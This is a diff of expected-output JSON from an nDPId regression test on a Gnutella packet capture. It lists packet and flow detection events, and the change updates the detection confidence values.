00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":2,"flow_last_seen":90885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90885,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA60AAEAGpYEtH5hwCgACD2jjxIsAuoYB181ecmAS\/\/\/cDQAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_packet_id":3,"flow_last_seen":90885,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90885,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoe4VAAIAGrawKAAIPLR+YcMSLaOPXzV5yALqGAlAQ+vD42QAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1043,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90885,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90885,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00573{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA68AAEARZkC5u0qtCgACD9DxcAkAc8xj\/3wxAm1gREr\/fw\/7dxmzAwEBAFQAAADx0Lm7Sq0AAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEJAkRVQ4BRAQE2UCoBbuAAAQAAAAAAAP\/\/C64DVExTQANESFRDAAABglFLRB3BTv4="} 00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":90892,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":90892,"pkt":"CAAn5uVZUlQAEjUCCABFAACHA7AAAEARNxaOhKUNCgACD3dmcAkAc2nw5\/IxAvsVo43\/HfOSkBgzAwEBAFQAAABmd46EpQ0AAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAv8HAkRVQ4BRAQE2UCoBBPgcHBMlAAAAAAAAAAEDVExTQANESFRDAAABglFLRFrK9p0="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":90896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90896,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7EAAEAGGR5LQAavCgACDxKHxH4Au4ABJ3TJMGAS\/\/\/xsQAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":90896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90896,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3P5AAIAGv9MKAAIPS0AGr8R+EocndMkwALuAAlAQ+vAOfgAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1050,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90897,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.64.6.175","src_port":50302,"dst_port":4743,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":90899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90899,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA7MAAEAGUiNhU7eUCgACDyK6xHUAvHoBhjAS2WAS\/\/94KQAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":90899,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90899,"pkt":"UlQAEjUCCAAn5uVZCABFAAAos+9AAIAGIeoKAAIPYVO3lMR1IrqGMBLZALx6AlAQ+vCU9QAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1058,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90739,"flow_last_seen":90905,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90905,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":90907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90907,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A7gAAEARKrzBIH7WCgACD+jMcAkAYGMhn1UxAqnqa\/T\/ZYYW3VylAwEBAEEAAADM6MEgftYIAAAAAAACAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEFAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtEmpBNrg=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":2,"flow_last_seen":91051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91051,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8YAAEAGMiyVHKOvCgACD8MkxIcAvm4BvtmXiWAS\/\/8GbQAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_packet_id":3,"flow_last_seen":91052,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91052,"pkt":"UlQAEjUCCAAn5uVZCABFAAAozKZAAIAG6U4KAAIPlRyjr8SHwyS+2ZeJAL5uAlAQ+vAjOQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":91057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91057,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8cAAEAG2CXL3Mb0CgACDwSqxHsAv2gBodiVp2AS\/\/+P0AAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":91057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91057,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTH9AAIAGD3EKAAIPy9zG9MR7BKqh2JWnAL9oAlAQ+vCsnAAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":2,"flow_last_seen":91058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91058,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8gAAEAG\/LTc7pFSCgACD4L3xIIAwGIBECov1GAS\/\/8zjQAAAgQFtA=="} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"149.28.163.175","src_port":50311,"dst_port":49956,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_packet_id":3,"flow_last_seen":91058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91058,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouGtAAIAGyBQKAAIP3O6RUsSCgvcQKi\/UAMBiAlAQ+vBQWQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":91058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91058,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"220.238.145.82","src_port":50306,"dst_port":33527,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1098,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":91059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91059,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":2,"flow_last_seen":91062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91062,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA8wAAEAG\/T488TDCCgACD1M1xIUAwVwBVNBhD2AS\/\/\/z9wAAAgQFtA=="} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_packet_id":3,"flow_last_seen":91062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91062,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxU5AAIAGu78KAAIPPPEwwsSFUzVU0GEPAMFcAlAQ+vAQxAAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1102,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":91062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":91062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":2,"flow_last_seen":91074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91074,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA84AAEAGXEIOyP\/lCgACD5DCxHYAwlYBrXv\/HGAS\/\/8kxQAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":91074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91074,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiFAAIAGKfIKAAIPDsj\/5cR2kMKte\/8cAMJWAlAQ+vBBkQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":91076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91076,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA9AAAEAGXEAOyP\/lCgACD7KOxHkAw1ABv2bicWAS\/\/8TtQAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":91076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91076,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiNAAIAGKfAKAAIPDsj\/5cR5so6\/ZuJxAMNQAlAQ+vAwgQAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":91716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91716,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYNAAIAGx74KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":91717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNNAAIAG5KUKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYJAAIAGGXYKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} @@ -1022,18 +1022,18 @@ 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":94638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94638,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03z1AAIAGuFYKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95216,"flow_last_seen":95216,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 